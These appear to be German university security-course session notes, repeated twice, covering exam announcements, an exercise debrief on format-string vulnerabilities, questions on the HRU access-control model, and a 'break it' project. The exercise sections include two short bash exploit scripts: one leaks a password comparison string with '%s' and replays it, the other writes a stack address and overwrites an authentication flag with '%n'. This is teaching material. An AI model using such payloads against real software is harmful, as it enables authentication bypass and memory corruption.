Ankündigungen:

    Prüfungsformat (Woche 20.7.)

    Ende Break it-Phase: 13. Juli (Nachbesprechung vom Projekt)


Gruppenarbeit:

Übung:

    Nachbesprechung

    %n, %x Adresse zugreifen

    \x12\x34\... von Authenticated (little endian)

    authenticated abhängig vom base Pointer


    #!/bin/bash


    if [ "$#" -ne 1 ]; then

            echo "Usage: $0 password2_executable"

            exit 1

    fi


    EXEC="./$1"

    printf '%%s\x00' | "$EXEC" > /tmp/file   # save compare string from strcmp

    printf '\x00' >> /tmp/file               # add NULL byte

    "$EXEC" < /tmp/file                      # Enter compare string from strcmp into program

    Vorbesprechung

    Was ist das Ziel beim HRU-Model

    Was sind Objekte/Subjekte? 

    Objekte = passive Teile 

    Subjekte = Programme

    Was könnten Rechte sein?

    Modellierung: Create subject s

    Modellierung: enter r into s, o

    Welche Probleme gibt es im HRU-Model?

    Entscheidbarkeit

    Security Automata vs HRU: Unterschiede, Gemeinsamkeiten?

Projekt:

     Issues lesen und kategorisieren.

     Gibt es weitere mögliche Angreiferideen?

     Strittige Themen bei den Angriffen?

     Wie seid ihr auf die Ideen gekommen?



Wer Zeit hat: 
Bitte Lesen: https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf

Ankündigungen:

    Prüfungsformat (Woche 20.7.)

    Ende Break it-Phase: 13. Juli (Nachbesprechung vom Projekt)


Gruppenarbeit:

Übung:

    Nachbesprechung

Angriffe:
Passwort mit "%s" ausgeben, oder:

Addresse im Format-String auf den Stack schreiben und mit "%n" überschreiben:

#!/bin/bash
addr='\xfc\xe0\xff\xff\xff\x7f\x00'
format_chars=$(python -c "print('%x' * $1 + '%n')")
echo -ne "$format_chars  $addr"

    Vorbesprechung

    Was ist das Ziel beim HRU-Model

    Was sind Objekte/Subjekte? 

    Was könnten Rechte sein?

    Modellierung: Create subject s

    Modellierung: enter r into s, o

    Welche Probleme gibt es im HRU-Model?

    Security Automata vs HRU: Unterschiede, Gemeinsamkeiten?

Projekt:

     Issues lesen und kategorisieren.

     Gibt es weitere mögliche Angreiferideen?

     Strittige Themen bei den Angriffen?

     Wie seid ihr auf die Ideen gekommen?



Wer Zeit hat: 
Bitte Lesen: https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf


